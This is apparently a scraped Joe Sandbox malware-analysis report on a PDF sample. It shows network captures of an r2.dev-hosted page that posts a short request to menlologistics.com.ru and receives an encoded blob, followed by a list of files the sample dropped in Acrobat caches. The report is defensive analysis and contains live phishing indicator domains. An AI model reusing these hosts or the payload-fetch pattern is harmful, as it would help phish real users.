2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31 31 33 2e 38 37 32 43 31 30 34 2e 30 31 38 20 31 31 34 2e 34 38 20 31 30 34 2e 33 38 37 20 31 31 35 2e 30 33 32 20 31 30 34 2e 38 35 33 20 31 31 35 2e 34 39 37 43 31 30 35 2e 33 31 39 20 31 31 35 2e 39 36 32 20 31 30 35 2e 38 37 32 20 31 31 36 2e 33 33 31 20 31 30 36 2e 34 38 31 20 31 31 36 2e 35 38 32 43 31 30 37 2e 30 38 39 20 31 31 36 2e 38 33 33 20 31 30 37 2e 37 34 31 20 31 31 36 2e 39 36 32 20 31 30 38 2e 33 39 39 20 31 31 36 2e 39 36 31 43 31 30 39 2e 37 32 38 20 31 31 36 2e 39 36 31 20 31 31 31 2e 30 30 31 20 31 31 36 2e 34 33 Data Ascii: h d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 113.872C104.018 114.48 104.387 115.032 104.853 115.497C105.319 115.962 105.872 116.331 106.481 116.582C107.089 116.833 107.741 116.962 108.399 116.961C109.728 116.961 111.001 116.43
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 38 2e 38 32 31 20 34 38 2e 39 35 31 36 43 31 30 34 2e 30 32 34 20 34 38 2e 39 35 31 36 20 31 30 30 2e 31 33 35 20 34 35 2e 30 36 32 37 20 31 30 30 2e 31 33 35 20 34 30 2e 32 36 35 35 43 31 30 30 2e 31 33 35 20 33 35 2e 34 36 38 34 20 31 30 34 2e 30 32 34 20 33 31 2e 35 37 39 35 20 31 30 38 2e 38 32 31 20 33 31 2e 35 37 39 35 43 31 31 33 2e 36 31 38 20 33 31 2e 35 37 39 35 20 31 31 37 2e 35 30 37 20 33 35 Data Ascii: 0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M108.821 48.9516C104.024 48.9516 100.135 45.0627 100.135 40.2655C100.135 35.4684 104.024 31.5795 108.821 31.5795C113.618 31.5795 117.507 35
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 38 34 2e 38 39 31 38 20 31 32 37 2e 35 38 31 48 31 36 34 2e 39 36 37 43 31 37 33 2e 33 34 35 20 31 32 37 2e 35 38 31 20 31 38 30 2e 31 33 37 20 31 33 34 2e 33 37 31 20 31 38 30 2e 31 33 37 20 31 34 32 2e 37 34 37 43 31 38 30 2e 31 33 37 20 31 35 31 2e 31 32 33 20 31 37 33 2e 33 34 35 20 31 35 37 2e 39 31 33 20 31 36 34 2e 39 36 37 20 31 35 37 2e 39 31 33 48 38 34 2e 38 39 Data Ascii: C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill="#6ECCE5" /> <path d="M84.8918 127.581H164.967C173.345 127.581 180.137 134.371 180.137 142.747C180.137 151.123 173.345 157.913 164.967 157.913H84.89
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30 33 38 20 31 34 35 2e 33 39 35 20 31 30 34 2e 30 32 31 20 31 34 37 2e 38 36 39 20 31 30 35 2e 38 30 38 20 31 34 39 2e 37 30 39 43 31 30 37 2e 35 39 35 20 31 35 31 2e 35 34 39 20 31 31 30 2e 30 33 39 20 31 35 32 2e 36 30 33 20 31 31 32 2e 36 30 34 20 31 35 32 2e 36 34 31 43 31 31 35 2e 31 36 38 20 31 35 32 2e 36 30 33 20 31 31 37 2e 36 31 33 20 31 35 31 2e 35 34 39 20 31 31 39 2e 34 20 31 34 39 2e 37 30 39 43 31 32 31 2e 31 38 37 20 31 34 37 2e 38 36 39 20 31 32 32 2e 31 37 20 31 34 35 2e 33 39 35 20 31 32 32 2e 31 33 34 20 31 34 32 2e Data Ascii: -mode: multiply"> <path d="M103.074 142.831C103.038 145.395 104.021 147.869 105.808 149.709C107.595 151.549 110.039 152.603 112.604 152.641C115.168 152.603 117.613 151.549 119.4 149.709C121.187 147.869 122.17 145.395 122.134 142.
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 38 37 2e 30 31 34 31 48 31 34 32 2e 31 37 37 56 39 31 2e 31 30 38 39 48 31 33 37 2e 30 38 37 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 38 37 2e 30 31 34 31 48 31 33 34 2e 39 33 34 56 39 31 2e 31 30 38 39 48 31 32 39 2e 38 35 32 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: fill="#0055DC" /> <path d="M137.087 87.0141H142.177V91.1089H137.087V87.0141Z" fill="#0055DC" /> <path d="M129.852 87.0141H134.934V91.1089H129.852V87.0141Z"

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:06:01 UTC	667	OUT	POST // HTTP/1.1 Host: menlologistics.com.ru Connection: keep-alive Content-Length: 17 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 19:06:01 UTC	17	OUT	Data Raw: 7b 22 6b 65 65 6e 22 3a 22 70 61 70 61 79 61 22 7d Data Ascii: {"keen":"papaya"}
2024-07-04 19:06:02 UTC	625	IN	HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 19:06:02 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PEQRMxN0lO97gd%2F8tRYzEOlCeNgPvdpKF5TxvSBWcgmRACuXocEtCmBpcnciUqLrDhA314JdaLb0MQYGi4HPwvLAgAXmcuYmsSVPImYIfxbhkGOmwBaDgIYrGdg2Kq4iiB6RjJ6fT1c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e163dd5f3c0c90-EWR alt-svc: h3=":443"; ma=86400
2024-07-04 19:06:02 UTC	744	IN	Data Raw: 34 31 34 30 0d 0a 7b 22 61 22 3a 22 4e 54 56 48 44 73 39 45 6d 46 4c 61 74 63 30 53 62 46 5a 34 72 68 74 61 44 31 6e 43 75 4a 32 53 4b 43 6c 36 6d 48 57 78 68 47 4c 62 64 7a 46 5a 35 4b 76 62 6c 66 6b 61 49 6f 78 31 5a 51 63 41 68 6c 75 4e 4d 71 52 4f 73 63 6e 6c 4b 33 4e 5c 2f 7a 68 61 46 75 61 5c 2f 34 54 72 37 5c 2f 57 2b 68 6e 63 4b 39 50 54 33 7a 52 65 6f 72 55 71 6d 70 4a 76 4f 5a 32 35 65 5c 2f 74 5a 4f 32 64 50 4d 4c 53 4b 48 30 62 51 72 77 38 6e 31 53 70 57 77 66 48 4f 2b 41 4a 78 56 31 37 46 4d 68 59 53 52 43 2b 6f 7a 6d 53 61 57 30 34 7a 52 75 5a 55 78 53 47 33 44 44 44 6c 70 50 34 77 33 6a 46 34 79 2b 35 4c 6d 49 7a 54 76 71 79 32 64 55 61 63 39 78 43 41 36 65 62 66 50 79 42 64 5a 74 31 75 48 67 71 5a 72 74 67 44 64 48 78 4d 62 51 58 63 4c 6a Data Ascii: 4140{"a":"NTVHDs9EmFLatc0SbFZ4rhtaD1nCuJ2SKCl6mHWxhGLbdzFZ5KvblfkaIox1ZQcAhluNMqROscnlK3N\/zhaFua\/4Tr7\/W+hncK9PT3zReorUqmpJvOZ25e\/tZO2dPMLSKH0bQrw8n1SpWwfHO+AJxV17FMhYSRC+ozmSaW04zRuZUxSG3DDDlpP4w3jF4y+5LmIzTvqy2dUac9xCA6ebfPyBdZt1uHgqZrtgDdHxMbQXcLj
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 66 39 67 50 34 61 4c 77 67 47 37 67 4f 53 68 30 76 48 4a 64 32 77 47 7a 75 44 50 32 4a 70 63 6d 64 36 45 6f 74 38 64 4b 76 71 44 49 68 50 43 63 58 4a 33 79 70 4f 57 35 56 32 7a 4e 62 2b 69 71 57 58 36 5c 2f 49 7a 47 65 53 79 45 65 54 59 4d 73 32 53 45 2b 52 45 48 48 45 76 54 6d 4b 73 6a 39 71 35 2b 63 61 6f 30 4a 70 2b 36 75 51 46 5a 78 68 5c 2f 6b 6a 4f 53 46 30 54 77 33 4b 49 37 52 57 57 33 6c 62 41 49 33 78 78 31 35 33 4a 70 37 62 4b 33 36 58 64 6d 34 56 62 5c 2f 51 49 5c 2f 6e 45 36 51 58 54 76 6f 78 66 4d 77 5a 45 37 62 59 6d 6c 6c 69 6f 69 4b 66 61 66 6f 4d 68 4f 78 4c 32 73 4f 6c 44 78 74 42 6c 33 62 54 2b 50 48 44 31 75 54 51 56 4b 34 64 4e 2b 65 67 6d 4e 36 78 77 52 43 41 43 36 69 54 73 47 47 6b 41 4e 45 30 4e 37 4a 30 7a 32 5c 2f 36 57 63 51 31 Data Ascii: f9gP4aLwgG7gOSh0vHJd2wGzuDP2Jpcmd6Eot8dKvqDIhPCcXJ3ypOW5V2zNb+iqWX6\/IzGeSyEeTYMs2SE+REHHEvTmKsj9q5+cao0Jp+6uQFZxh\/kjOSF0Tw3KI7RWW3lbAI3xx153Jp7bK36Xdm4Vb\/QI\/nE6QXTvoxfMwZE7bYmllioiKfafoMhOxL2sOlDxtBl3bT+PHD1uTQVK4dN+egmN6xwRCAC6iTsGGkANE0N7J0z2\/6WcQ1
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 73 70 76 6c 73 52 58 52 36 4f 79 69 55 70 54 5a 4a 65 50 39 54 54 35 57 32 76 31 31 34 7a 46 56 61 39 69 30 5a 4c 68 33 76 59 41 45 79 76 41 70 57 65 77 33 6e 4c 45 6f 6c 5a 70 66 6b 6e 49 4b 56 51 44 39 6b 2b 55 7a 35 42 7a 64 67 49 64 51 6c 72 70 4a 4d 51 69 44 59 73 70 63 2b 58 57 36 70 62 78 6c 6b 36 42 71 4b 2b 55 74 35 30 45 71 44 78 50 4d 67 75 41 48 73 58 66 5c 2f 46 4f 7a 42 37 4a 70 52 53 6a 63 76 6e 47 33 42 49 49 74 64 70 2b 67 33 77 4f 5a 6c 4e 79 37 50 41 6b 72 41 33 35 56 46 65 2b 5a 7a 51 2b 65 46 4c 33 78 4e 51 76 53 33 69 38 47 35 52 75 5c 2f 36 76 75 5a 65 61 69 62 33 59 54 51 7a 6e 47 4c 30 54 53 63 41 6e 6f 32 5c 2f 58 62 64 42 79 66 69 7a 5a 37 5c 2f 62 65 4b 6a 53 4a 4f 63 39 63 71 4a 34 55 74 71 5c 2f 58 76 34 68 32 4e 2b 69 38 48 Data Ascii: spvlsRXR6OyiUpTZJeP9TT5W2v114zFVa9i0ZLh3vYAEyvApWew3nLEolZpfknIKVQD9k+Uz5BzdgIdQlrpJMQiDYspc+XW6pbxlk6BqK+Ut50EqDxPMguAHsXf\/FOzB7JpRSjcvnG3BIItdp+g3wOZlNy7PAkrA35VFe+ZzQ+eFL3xNQvS3i8G5Ru\/6vuZeaib3YTQznGL0TScAno2\/XbdByfizZ7\/beKjSJOc9cqJ4Utq\/Xv4h2N+i8H
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 69 47 4f 44 2b 41 6c 73 39 30 78 78 62 4a 67 55 74 32 49 56 4e 46 2b 79 73 4d 6d 55 4c 4d 30 33 34 48 71 71 49 56 61 78 41 50 5c 2f 35 63 43 7a 67 6f 52 77 77 2b 78 4c 45 4b 5a 51 4b 7a 74 4f 74 7a 4a 38 67 73 35 43 66 48 64 43 4d 35 57 4f 75 33 70 56 6d 6a 47 62 69 65 48 76 6a 65 2b 35 42 57 50 30 76 36 38 7a 63 31 72 4d 5c 2f 32 7a 4e 74 33 47 4c 64 4e 55 31 48 38 74 67 77 70 45 46 78 6e 79 66 66 67 30 48 2b 77 75 4e 55 57 73 4c 33 74 4c 36 70 6c 74 34 42 4d 50 50 6f 34 5c 2f 73 45 43 38 6d 4e 4c 56 6f 73 75 49 47 45 61 4e 6a 4e 55 4c 6c 48 4a 58 61 52 54 49 43 73 69 75 77 39 49 53 46 64 35 5c 2f 33 48 4c 77 67 36 56 47 69 6d 4c 73 71 67 33 69 71 6e 4c 37 43 39 50 78 65 73 46 43 7a 51 56 61 48 72 50 36 50 64 76 4c 42 36 6b 34 59 42 46 53 55 49 52 76 4b Data Ascii: iGOD+Als90xxbJgUt2IVNF+ysMmULM034HqqIVaxAP\/5cCzgoRww+xLEKZQKztOtzJ8gs5CfHdCM5WOu3pVmjGbieHvje+5BWP0v68zc1rM\/2zNt3GLdNU1H8tgwpEFxnyffg0H+wuNUWsL3tL6plt4BMPPo4\/sEC8mNLVosuIGEaNjNULlHJXaRTICsiuw9ISFd5\/3HLwg6VGimLsqg3iqnL7C9PxesFCzQVaHrP6PdvLB6k4YBFSUIRvK
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 45 4f 62 35 66 48 2b 58 75 42 7a 54 59 36 51 62 72 6e 45 79 78 73 6e 46 56 2b 42 74 32 56 30 5c 2f 32 66 65 6e 49 61 54 6e 4f 4b 70 34 43 71 6e 34 67 76 41 76 39 4d 6d 74 33 30 55 35 55 4e 64 56 72 33 43 44 7a 51 35 6e 69 74 48 51 6d 4e 30 6b 37 38 66 4d 56 49 6c 5c 2f 45 53 37 48 6d 78 72 69 67 4f 6a 72 6a 66 53 42 55 67 55 46 47 67 4b 59 77 5c 2f 7a 49 77 6d 45 76 30 34 6f 36 4b 50 32 46 59 30 74 75 58 77 79 51 7a 61 65 58 74 72 74 63 55 7a 4c 6c 5c 2f 69 57 6b 42 54 75 54 68 69 4b 42 2b 51 38 76 46 45 44 77 32 69 35 65 44 76 35 51 45 6a 4c 56 62 31 38 51 32 52 30 56 49 42 74 4c 72 48 45 67 6b 33 43 49 46 4f 76 36 4d 39 52 6c 6f 44 73 56 72 6e 57 70 48 79 75 45 53 4c 76 59 6b 6e 56 5c 2f 77 68 53 59 4d 4f 56 6f 4b 74 64 77 55 4c 64 53 51 73 75 53 53 5c Data Ascii: EOb5fH+XuBzTY6QbrnEyxsnFV+Bt2V0\/2fenIaTnOKp4Cqn4gvAv9Mmt30U5UNdVr3CDzQ5nitHQmN0k78fMVIl\/ES7HmxrigOjrjfSBUgUFGgKYw\/zIwmEv04o6KP2FY0tuXwyQzaeXtrtcUzLl\/iWkBTuThiKB+Q8vFEDw2i5eDv5QEjLVb18Q2R0VIBtLrHEgk3CIFOv6M9RloDsVrnWpHyuESLvYknV\/whSYMOVoKtdwULdSQsuSS\
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 6a 65 63 6f 4e 66 44 57 48 44 31 48 53 50 76 42 46 4f 52 55 72 47 62 49 69 74 62 6b 32 36 76 72 73 68 6d 44 7a 45 4c 53 6a 39 49 75 6d 72 66 6e 59 58 54 37 50 6c 79 54 4a 73 34 4c 35 76 78 64 45 76 35 41 6f 71 5c 2f 38 6e 31 39 56 33 75 6f 2b 73 57 50 53 54 61 65 42 31 52 41 70 6c 76 46 36 61 6a 4b 61 61 4e 31 70 58 31 35 6b 56 32 46 42 53 73 37 39 69 55 71 36 4b 74 6f 59 50 58 46 4c 52 2b 48 33 6d 32 49 70 69 6f 44 4c 4e 73 49 64 62 4f 68 67 46 4a 59 57 4a 50 4d 31 30 53 75 37 35 52 36 6e 6e 2b 48 78 30 79 58 4f 2b 4e 70 55 6d 41 42 2b 51 46 56 47 32 67 4a 75 51 33 6d 5c 2f 30 5c 2f 6e 33 68 64 4b 67 71 4c 70 66 51 75 31 70 72 2b 31 51 33 59 53 4f 64 57 4c 4d 53 53 72 6b 76 77 37 77 31 51 56 77 4b 6e 65 66 37 52 67 63 59 32 78 59 53 77 77 4d 6c 37 43 38 Data Ascii: jecoNfDWHD1HSPvBFORUrGbIitbk26vrshmDzELSj9IumrfnYXT7PlyTJs4L5vxdEv5Aoq\/8n19V3uo+sWPSTaeB1RAplvF6ajKaaN1pX15kV2FBSs79iUq6KtoYPXFLR+H3m2IpioDLNsIdbOhgFJYWJPM10Su75R6nn+Hx0yXO+NpUmAB+QFVG2gJuQ3m\/0\/n3hdKgqLpfQu1pr+1Q3YSOdWLMSSrkvw7w1QVwKnef7RgcY2xYSwwMl7C8
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 5a 71 69 64 44 70 73 4a 44 65 46 56 76 55 31 4e 39 69 66 4b 2b 36 61 68 33 5c 2f 5c 2f 59 37 48 47 62 59 4d 6b 30 2b 32 6b 43 30 76 38 55 68 4f 77 36 64 5a 7a 39 79 55 54 68 79 65 31 4f 75 33 69 4c 6c 6c 45 4a 66 36 54 72 50 62 38 47 41 39 66 47 50 62 73 38 30 4a 79 6c 62 73 58 62 55 37 6f 78 63 44 49 35 38 69 42 67 33 53 48 77 6c 53 44 49 63 5a 45 31 33 76 7a 73 47 48 37 63 4c 51 49 43 51 6d 67 47 55 66 47 6b 76 2b 69 41 50 4e 62 65 55 6c 58 65 36 41 74 53 51 4e 4b 6b 34 35 74 78 5c 2f 30 41 37 48 79 5a 43 4f 30 6a 37 69 6c 4d 58 57 32 59 34 38 41 62 66 69 36 74 68 65 4c 47 41 51 47 6e 4e 6e 31 43 36 47 70 61 32 65 6e 48 68 6a 54 79 2b 67 52 69 4e 4e 76 68 76 50 36 73 38 37 59 63 4b 44 34 75 76 61 76 66 77 75 4f 61 48 64 7a 6e 56 73 53 4b 76 5a 4a 58 4b Data Ascii: ZqidDpsJDeFVvU1N9ifK+6ah3\/\/Y7HGbYMk0+2kC0v8UhOw6dZz9yUThye1Ou3iLllEJf6TrPb8GA9fGPbs80JylbsXbU7oxcDI58iBg3SHwlSDIcZE13vzsGH7cLQICQmgGUfGkv+iAPNbeUlXe6AtSQNKk45tx\/0A7HyZCO0j7ilMXW2Y48Abfi6theLGAQGnNn1C6Gpa2enHhjTy+gRiNNvhvP6s87YcKD4uvavfwuOaHdznVsSKvZJXK
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 66 75 7a 6c 77 4f 48 6e 67 30 32 73 75 42 39 34 39 68 45 6d 64 6a 5a 4c 45 49 44 73 4f 34 68 54 62 57 2b 43 76 6d 66 61 76 7a 79 37 70 62 4f 43 42 46 6a 30 6a 5a 62 68 43 4a 34 71 47 50 65 64 54 67 54 6e 67 47 54 62 4a 33 52 63 43 6c 65 79 75 39 56 66 41 68 72 76 7a 49 31 63 39 59 78 63 50 73 59 46 42 56 46 7a 54 64 52 5c 2f 41 4e 71 65 67 39 35 55 54 43 48 59 41 53 42 75 66 38 4d 74 56 71 36 67 46 31 58 37 37 47 4f 6c 77 48 71 35 6a 54 61 45 46 5a 52 43 31 53 74 30 54 47 56 34 35 41 42 77 75 70 74 33 2b 48 59 48 61 59 45 4f 53 59 75 32 31 78 68 46 54 50 67 6f 51 56 5c 2f 61 50 42 54 62 57 73 61 35 56 56 75 50 6d 31 4e 6a 72 52 62 53 6a 43 61 56 67 59 49 45 30 69 42 48 69 77 43 58 43 39 4d 52 33 70 70 34 65 71 69 38 4e 76 54 30 69 63 63 7a 5a 4c 73 37 34 Data Ascii: fuzlwOHng02suB949hEmdjZLEIDsO4hTbW+Cvmfavzy7pbOCBFj0jZbhCJ4qGPedTgTngGTbJ3RcCleyu9VfAhrvzI1c9YxcPsYFBVFzTdR\/ANqeg95UTCHYASBuf8MtVq6gF1X77GOlwHq5jTaEFZRC1St0TGV45ABwupt3+HYHaYEOSYu21xhFTPgoQV\/aPBTbWsa5VVuPm1NjrRbSjCaVgYIE0iBHiwCXC9MR3pp4eqi8NvT0icczZLs74
2024-07-04 19:06:02 UTC	1369	IN	Data Raw: 51 75 70 4a 38 59 70 50 42 57 78 4f 5a 63 39 77 54 72 35 6c 55 39 53 34 53 44 32 52 77 4e 51 6e 46 2b 64 71 4e 4c 36 6d 57 6b 6a 63 73 64 78 4a 42 66 59 51 38 43 4c 47 79 30 6a 65 5a 79 4d 52 30 43 76 31 77 4b 65 71 47 65 4a 50 73 53 66 7a 31 6b 6f 67 50 74 37 43 6b 5c 2f 73 4d 30 75 43 4f 79 67 55 47 41 53 5a 4c 4c 79 62 6d 47 6b 70 62 79 30 33 32 78 75 5c 2f 36 37 31 4c 62 73 43 74 37 66 42 38 75 71 54 56 42 71 63 35 63 31 43 75 6d 4b 77 37 51 44 34 39 45 79 71 69 72 70 79 53 4d 72 33 75 33 4a 50 71 37 4d 45 47 43 77 53 48 32 42 6d 4a 55 5a 6e 67 2b 61 63 6b 59 56 41 6e 49 78 46 56 79 30 33 77 74 6f 46 65 49 6b 69 61 38 5a 59 31 6c 76 32 6f 4a 30 31 52 45 71 50 67 34 61 57 73 43 66 34 62 43 6b 36 4f 6c 63 67 68 39 72 6c 75 79 53 35 4a 52 65 4b 46 4a 41 Data Ascii: QupJ8YpPBWxOZc9wTr5lU9S4SD2RwNQnF+dqNL6mWkjcsdxJBfYQ8CLGy0jeZyMR0Cv1wKeqGeJPsSfz1kogPt7Ck\/sM0uCOygUGASZLLybmGkpby032xu\/671LbsCt7fB8uqTVBqc5c1CumKw7QD49EyqirpySMr3u3JPq7MEGCwSH2BmJUZng+ackYVAnIxFVy03wtoFeIkia8ZY1lv2oJ01REqPg4aWsCf4bCk6Olcgh9rluyS5JReKFJA

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xJwSq336bs.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6a79b8f2-ab61-4260-8486-dda0d6ac7843.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240704190535Z-154.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.1076

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Windows Analysis Report
xJwSq336bs.pdf

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:06:03 UTC	641	OUT	GET /, HTTP/1.1 Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 19:06:04 UTC	180	IN	HTTP/1.1 404 Not Found Date: Thu, 04 Jul 2024 19:06:03 GMT Content-Type: text/html Content-Length: 27150 Connection: close Server: cloudflare CF-RAY: 89e163edf89dc466-EWR
